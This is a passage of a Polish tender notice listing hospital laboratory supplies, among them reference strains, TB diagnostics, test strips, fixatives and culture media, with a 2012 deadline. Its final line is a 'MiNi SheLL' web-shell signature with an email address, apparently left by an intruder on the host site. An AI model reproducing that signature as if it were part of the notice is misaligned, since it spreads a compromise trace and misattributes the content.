<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 25 - Szczepy wzorcowe wyszczególnione w załączniku 2.25 do SIWZ:
1. Haemophilus influenzae NTCT 8468 - zamawiana ilość - 1 szt. wymagana wielkość op. - 	1
2. Staphylococcus ureus ATCC 29213 - zamawiana ilość - 1 szt. wymagana wielkość op. - 	1
3. Streptococcus pneumoniae ATCC 49619 - zamawiana ilość - 1 szt. wymagana wielkość op. - 	1
4. Neisseria gonorrhoeae ATCC 19424 - zamawiana ilość - 1 szt. wymagana wielkość op. - 	1
5. Mycobacterium tuberculosis ATCC 25177 - zamawiana ilość - 1 szt. wymagana wielkość op. - 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> PAKIET nr 26 - Diagnostyka genetyczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 26 - Diagnostyka genetyczna wyszczególniona w załączniku 2.26 do SIWZ:
1. Colcemid 10ug/ml - zamawiana ilość - 40 ml, oferowana wielkość op. - 10 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> PAKIET nr 27 - Morfologia krwi obwodowej na urządzeniu MICROS OTB 60 (HORIBA).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 27 - Morfologia krwi obwodowej na urządzeniu MICROS OTB 60 (HORIBA) wyszczególniona w załączniku nr 2.27 do SIWZ:
1. Morfologia krwi obwodowej - zamawiana ilość - 8 000 ozn.
UWAGI:                                                                                                                                                                                                                                                                                                      1.Wykonawca proponuje wszystkie odczynniki niezbędne do wykonania w/w ilości oznaczeń w dodatkowej tabeli.
2. W przypadku stwierdzenia i udokumentowania błędnego (mniejszego) oszacowania przez Wykonawcę oferowanych ilości odczynników Wykonawca zobowiązuje się do uzupełnienia braków na własny koszt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> PAKIET nr 28 - Diagnostyka gruźlicy dla aparatu MB/BACT 120 (BioMerieux).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 28 - Diagnostyka gruźlicy dla aparatu MB/BACT 120 (BioMerieux) wyszczególniona w załączniku 2.28 do SIWZ:
1. BaCT / Alert MP Process Bottle -zamawiana ilość - 400 szt.
2. Anibiotic Supplement kit MB/BaCT - zamawiana ilość - 6 op.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> PAKIET nr 29 - Diagnostyka narkotyków w moczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 29 - Diagnostyka narkotyków w moczu wyszczególniona w załączniku 2.29 do SIWZ:
1. 5-parametrowe testy paskowe do wykrywania: kokainy, amfetaminy, marihuany, morfiny, benzodiazepin w moczu - zamawiana ilość - 30 szt. wymagana wielkość op. - 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> PAKIET nr 30 - Diagnostyka moczu - paski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 30 - Diagnostyka moczu - paski wyszczególniona w załączniku 2.30 do SIWZ:
1. Paski do badania moczu ( parametry: glukoza, ciała ketonowe, białko) - zamawiana ilość - 20 000 szt. wymagana wielkość op.- 100 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> PAKIET nr 31 - Oznaczanie glukozy - paski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 31 - Oznaczanie glukozy - paski wyszczególnione w załączniku 2.31 do SIWZ:
1. Paski do oznaczania glukozy we krwi współpracujące z glukometrem Contour Ts.	- zamawiana ilość - 20 000 szt.	 wymagana wielkość op. - 50 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> PAKIET nr 32 - Paski fluoresceinowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 32 - Paski fluoresceinowe wyszczególnione w załączniku 2.32 do SIWZ:
1. Paski fluoresceinowe	- zamawiana ilość - 15 000 szt. wymagana wielkość op. - 1 000 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> PAKIET nr 33 - Parafina histologiczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 33 - Parafina histologiczna wyszczególniona w załączniku 2.33 do SIWZ:
1. Parafina histologiczna granulowana (pkt. krzep.  54-56 st.C.) - zamawiana ilość - 880 kg, wymagana wielkość op. - 20 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> PAKIET nr 34 - Formaldehyd.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 34 - Formaldehyd wyszczególniony w załączniku 2.34 do SIWZ:
1. Formaldehyd 10 % - zamawiana ilość - 120 l, wymagana wielkość op. - 5 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> PAKIET nr 35 - Wosk biały.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 35 - Wosk biały wyszczególniony w załączniku 2.35 do SIWZ:
1. Wosk biały FPVI (cera alba) - zamawiana ilość - 18 kg.
Uwagi:
Oferowana wielkość opakowania nie może być większa niż 500 g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> PAKIET nr 36 - Analityka ogólna - hematologia i cytologia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 36 - Analityka ogólna - hematologia i cytologia wyszczególniona w załączniku 2.36 do SIWZ:
1. Olejek imersyjny - zamawiana ilość - 2 600 ml, wymagana wielkość op. - 100 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> PAKIET nr 37 - Bakteriologia manualna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 37 - Bakteriologia manualna wyszczególniona w załączniku 2.37 do SIWZ:
1. Podłoże do wybiórczej izolacji  Listeria spp./płytki/	- zamawiana ilość - 40 szt. 	wymagana wielkość op. - 10 szt.
2. Wybiórcze podłoże do hodowli bakterii z rodzaju HAEMOPHILUS /płytki/ - zamawiana ilość -	 200 szt. wymagana wielkość op. - 10 szt.
3. Podłoże MUELLER-HINTON z KLOKSACYLINĄ 250 ug/ml /płytki/	- zamawiana ilość - 10 szt. wymagana wielkość op. - 10 szt.
4. Podłoże MUELLER-HINTON AGAR z 5% krwią końską  i  20 mg/l NAD /płytki/	- zamawiana ilość - 100 szt. wymagana wielkość op. - 10 szt.
5. Agarek amerykański do przechowywania szczepów  wzorcowych - zamawiana ilość - 30 szt. wymagana wielkość op. -	1 szt.
6. Bulion pneumokokowi do przechowywania szczepów wzorcowych pneumokoków	- zamawiana ilość - 10 szt. wymagana wielkość op. - 1 szt.
7. Kwas boronowy- identyfikavja szczepów KPC	 - zamawiana ilość -10 ml, wymagana wielkość op. - 2 ml
8. EDTA 0.5M - zamawiana ilość - 10 ml, wymagana wielkość op. - 2 ml
9. Sole żółci / do identyfikacji S.pneumoniae/ - zamawiana ilość -6 ml, wymagana wielkość op. - 2 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> PAKIET nr 38 - Diagnostyka Zakażeń Prątkiem Gruźlicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr 38 - Diagnostyka Zakażeń Prątkiem Gruźlicy wyszczególniona w załączniku nr 2.38 do SIWZ:
1. Test służący do wykrywania interferonu gamma produkowanego przez limfocyty T pod wpływem ich stymulacji  antygenami specyficznymi dla Mycobacterium tuberculosis - zamawiana ilość - 300 ozn. 
Uwagi:
1.Zestaw odczynników jest kompletny tzn. zawiera WSZYSTKIE odczynniki umożliwiające jego wykonanie.
2. Zestaw umożliwia wykonanie pojedynczego oznaczenia lub procedura wykonania przewiduje możliwość przechowywania materiału do badań  w czasie co najmniej  1 miesiąca  od pobrania krwi.
3. Procedura wykonania oznaczenia zapewnia możliwość jego wykonania w czasie  co najmniej 24 godzin od pobrania krwi.
4. Oznaczenie nie daje krzyżowych reakcji u pacjentów szczepionych szczepionką BCG.
5. Wykonawca dostarcza probówki do pobierania krwi u dorosłych /90%/ i dzieci/ 10%/  w ilości proporcjonalnej do ilości zamawianych oznaczeń. Probówki winny być kompatybilne z akcesoriami do pobierania krwi w systemie zamkniętym Beton Dickinson lub Wykonawca oprócz probówek  do pobierania krwi dostarcza służące do jej pobrania akcesoria.
6. Wykonawca dostarcza narzędzia do kalkulowania wyników badań.
7. Wykonawca uzupełnia dodatkową tabelę  o WSZYSTKIE  elementy zestawu umożliwiające wykonanie  zamawianego  oznaczenia.
8. W przypadku stwierdzenia i udokumentowania błędnego (mniejszego) oszacowania przez Wykonawcę ilości odczynników w stosunku do ilości zamawianych oznaczeń Wykonawca zobowiązuje się do uzupełnienia braków na własny koszt.
9. Wykonawca ( informacyjnie) podaje całkowity koszt jednego oznaczenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com